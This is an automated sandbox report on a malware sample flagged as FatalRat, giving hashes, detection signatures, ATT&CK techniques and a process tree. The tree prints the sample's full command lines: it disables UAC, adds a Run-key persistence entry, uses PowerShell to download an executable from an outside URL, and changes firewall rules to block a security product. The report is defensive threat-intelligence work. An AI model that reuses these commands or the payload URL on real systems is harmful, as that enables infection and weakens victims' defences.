Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
152s -
platform
windows7_x64 -
resource
win7-20241023-en -
resource tags
arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system -
submitted
23/02/2025, 12:47
Static task
static1
Behavioral task
behavioral1
Sample
2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe
Resource
win10v2004-20250217-en
General
-
Target
2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe
-
Size
20.0MB
-
MD5
f999f60afb55137a3c068a707a421a5f
-
SHA1
15f5a8d7930cef9479caf9ecc2dd2c2d8f1efb32
-
SHA256
b17337db64b6ab60e969cec89c36058baf5e100c25684bda9beb0afa1c342b4d
-
SHA512
24a7ffcec017937eec514a2bf2d1d36632abb829ece9fe59c63decb4c07e52f3a0ae8d09c8e7f61fa0f7fa1ecef5fdae8702ab48a09266391969fb71b85fbe4c
-
SSDEEP
196608:patpgF2oM7Vk96Cy8xEqn0SweKG8UvMGnsOTMk:otpgF2oM7Vk96Cy8xEqn0MlDvtnsO4
Malware Config
Extracted
https://baba-1336130708.cos.ap-tokyo.myqcloud.com/tsetup-x64.5.11.1.exe
Signatures
-
Fatalrat family
-
UAC bypass 3 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Fatal Rat payload 1 IoCs
resource yara_rule behavioral1/memory/2768-93-0x00000000004D0000-0x00000000004F9000-memory.dmp fatalrat -
Blocklisted process makes network request 2 IoCs
flow pid Process 17 544 powershell.exe 18 544 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 17 544 powershell.exe -
Modifies Windows Firewall 2 TTPs 8 IoCs
pid Process 1036 netsh.exe 2428 netsh.exe 2096 netsh.exe 2292 netsh.exe 1072 netsh.exe 1980 netsh.exe 708 netsh.exe 1348 netsh.exe -
Executes dropped EXE 1 IoCs
pid Process 2768 Agghosts.exe -
Loads dropped DLL 1 IoCs
pid Process 2768 Agghosts.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\GoogleUpdata_Service = "C:\\programdata\\lnk\\dick.lnk" reg.exe -
pid Process 544 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 24 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Agghosts.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Agghosts.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Agghosts.exe -
Suspicious behavior: EnumeratesProcesses 59 IoCs
pid Process 2360 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 2360 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 2360 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 2360 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 2360 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 2360 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 2360 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 544 powershell.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe 2768 Agghosts.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2768 Agghosts.exe Token: SeDebugPrivilege 544 powershell.exe -
Suspicious use of WriteProcessMemory 49 IoCs
description pid Process procid_target PID 2360 wrote to memory of 2708 2360 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 32 PID 2360 wrote to memory of 2708 2360 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 32 PID 2360 wrote to memory of 2708 2360 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 32 PID 2360 wrote to memory of 2768 2360 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 34 PID 2360 wrote to memory of 2768 2360 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 34 PID 2360 wrote to memory of 2768 2360 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 34 PID 2360 wrote to memory of 2768 2360 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 34 PID 2708 wrote to memory of 2508 2708 cmd.exe 35 PID 2708 wrote to memory of 2508 2708 cmd.exe 35 PID 2708 wrote to memory of 2508 2708 cmd.exe 35 PID 2360 wrote to memory of 920 2360 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 36 PID 2360 wrote to memory of 920 2360 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 36 PID 2360 wrote to memory of 920 2360 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 36 PID 2360 wrote to memory of 2432 2360 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 38 PID 2360 wrote to memory of 2432 2360 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 38 PID 2360 wrote to memory of 2432 2360 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 38 PID 2360 wrote to memory of 1440 2360 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 40 PID 2360 wrote to memory of 1440 2360 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 40 PID 2360 wrote to memory of 1440 2360 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe 40 PID 2432 wrote to memory of 3004 2432 cmd.exe 42 PID 2432 wrote to memory of 3004 2432 cmd.exe 42 PID 2432 wrote to memory of 3004 2432 cmd.exe 42 PID 2432 wrote to memory of 544 2432 cmd.exe 43 PID 2432 wrote to memory of 544 2432 cmd.exe 43 PID 2432 wrote to memory of 544 2432 cmd.exe 43 PID 1440 wrote to memory of 2428 1440 cmd.exe 44 PID 1440 wrote to memory of 2428 1440 cmd.exe 44 PID 1440 wrote to memory of 2428 1440 cmd.exe 44 PID 1440 wrote to memory of 2096 1440 cmd.exe 45 PID 1440 wrote to memory of 2096 1440 cmd.exe 45 PID 1440 wrote to memory of 2096 1440 cmd.exe 45 PID 1440 wrote to memory of 2292 1440 cmd.exe 46 PID 1440 wrote to memory of 2292 1440 cmd.exe 46 PID 1440 wrote to memory of 2292 1440 cmd.exe 46 PID 1440 wrote to memory of 1072 1440 cmd.exe 47 PID 1440 wrote to memory of 1072 1440 cmd.exe 47 PID 1440 wrote to memory of 1072 1440 cmd.exe 47 PID 1440 wrote to memory of 1980 1440 cmd.exe 48 PID 1440 wrote to memory of 1980 1440 cmd.exe 48 PID 1440 wrote to memory of 1980 1440 cmd.exe 48 PID 1440 wrote to memory of 708 1440 cmd.exe 49 PID 1440 wrote to memory of 708 1440 cmd.exe 49 PID 1440 wrote to memory of 708 1440 cmd.exe 49 PID 1440 wrote to memory of 1348 1440 cmd.exe 50 PID 1440 wrote to memory of 1348 1440 cmd.exe 50 PID 1440 wrote to memory of 1348 1440 cmd.exe 50 PID 1440 wrote to memory of 1036 1440 cmd.exe 51 PID 1440 wrote to memory of 1036 1440 cmd.exe 51 PID 1440 wrote to memory of 1036 1440 cmd.exe 51
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Public\Downloads\20250223024744\1.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
PID:2508
-
-
-
C:\programdata\20250223024744\Agghosts.exe"C:\programdata\20250223024744\Agghosts.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2768
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f2⤵
- Adds Run key to start application
PID:920
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Public\Videos\download_and_run.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Windows\system32\chcp.comchcp 650013⤵PID:3004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://baba-1336130708.cos.ap-tokyo.myqcloud.com/tsetup-x64.5.11.1.exe', 'C:\Users\Public\Videos\bin.exe')"3⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:544
-
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Public\Downloads\20250223024744\fhq.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Block Program Network Access" dir=in action=block program="" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2428
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Block Program Network Access" dir=out action=block program="" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2096
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Block Program Network Access2" dir=in action=block program="safemon\360tray.exe=360Safe.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2292
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Block Program Network Access2" dir=out action=block program="safemon\360tray.exe=360Safe.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1072
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state on3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1980
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile settings inboundusernotification disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:708
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile settings inboundusernotification disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1348
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile settings inboundusernotification disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1036
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify System Firewall
1Disable or Modify Tools
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.7MB
MD52a24dcd41bc3c5b5f7eceda525786578
SHA17e898f9ee5a97a1a261326f0168e8de44dcf8af4
SHA256169e9e4b23878035551455f4e5dbd01ece204e59fe75361680e8786998059ca7
SHA512aaded4c72d3fa77eefd9d4b098288dd6923bd79813466d93313d6acb00fea9bb90248fff92cc89a625c60ae3b7cc1c27e8bb178fdac624ec896267da57b9fd6a
-
Filesize
1KB
MD56fad1bf37c81f67455cf0a0c58a36ed0
SHA116c12891c7a03ecc7368e27fa66e2b9bc82358a2
SHA2561e3dd035f7298068310ff06f8d4387cc239084a1590233fed5100663a1a70b81
SHA5122a1cebe1f6760ca088402b4c9725f706f16cd194d332c9c36415fc726504bea253319c1a6c85f20d32f2d42e71ff057a6fcab6baccc5d5871dbc30f231dd8139
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD538267d023abd6bf6c8425b2bc43be18a
SHA158f70c76e62487e0ec7c66a0ebb2efadcc698f8b
SHA256e9e94a30b36ca3fe3f93ecccbd53cb822c0c21cb41515a7d447f461558704de1
SHA512e668f7c113938bf165ee0bc02b006dc2311085208962fa5b5a80f92487538db3684413c475119cd4b6a4900b2f07cfc84b2a44c0382d3e02cb30bf66fd8c8b7b
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
229B
MD5fa42ebb1071abc0e618c296ea2cf71a6
SHA19e0c0737b0e37b3e821d011eecd9b0c7c9f2a15a
SHA256395f835731d25803a791db984062dd5cfdcade6f95cc5d0f68d359af32f6258d
SHA5120ed9919675c224201996caeeecf625a1db00a70af5d3ba135dc3d6fa16bfcc562426c813e21b4e861f04d312635be3528d79b5c49b23e78161f2b051fa9aaf05
-
Filesize
1KB
MD53a7cb580bd340505f6dc5b4c829a3eca
SHA121cc730517d74fa1d13316d7e0d817f3bd710906
SHA2561c1528b546aa29be6614707cbe408cb4b46e8ed05bf3fe6b388b9f22a4ee37e2
SHA512c224fa676542b90f8fc990e574028af664dced61612855290fb23ce4acad2d6b9043e901365939106b591b6746b3e4ddada15eede88a947051e9d8083194e630
-
Filesize
415B
MD5a90ccfd040d774b547f7d258b8e03661
SHA1c46e353d34723f9393482974a516d51dfb52440d
SHA256d852cfc4107e9ce5bec7349ef180366bbb4fe0878e725325a2b844f93a1ac1e2
SHA512bdc816781c44b6e9bbc8207a3c0466a45397cf7815f267add21abe243bf138b5bae7ffec867433bf249e139b726413f68b7002f541c89ae1a25bd1e6980abfd7
-
Filesize
192KB
MD52fd94f6e1d71454d716a126f0d7450ac
SHA15d966df95c741880089e9078af921a22216516ec
SHA256a599cbb05b69328655a7a0afc2644ed607c30a05edfb8fd6be2ea920c25b54b5
SHA512340107b69fc49b8fe1acf37a3a6e40c4b7206cf3ae069fea6f4ba702a733401e1feef55e1d858b3529764bcd0ba371ef552f5838444b65b62545e1da150f9bb2
-
Filesize
1.9MB
MD5b7f8c3416cdfd6f46c790da064f66099
SHA1d7ae9a3d49bbf1981e7d6604128e18b6cd160bd6
SHA256b9edf03447cf402e24da384c146c9d1536871a47518c795c4aea6550e3abd94d
SHA51224272954e57f4f4f81dad90469e84946549e3441ba599f8b819d069b803687b3da35f449c0f18755352dba208d6d63af1d6b53c0a56adbd36540b1537bb99dc7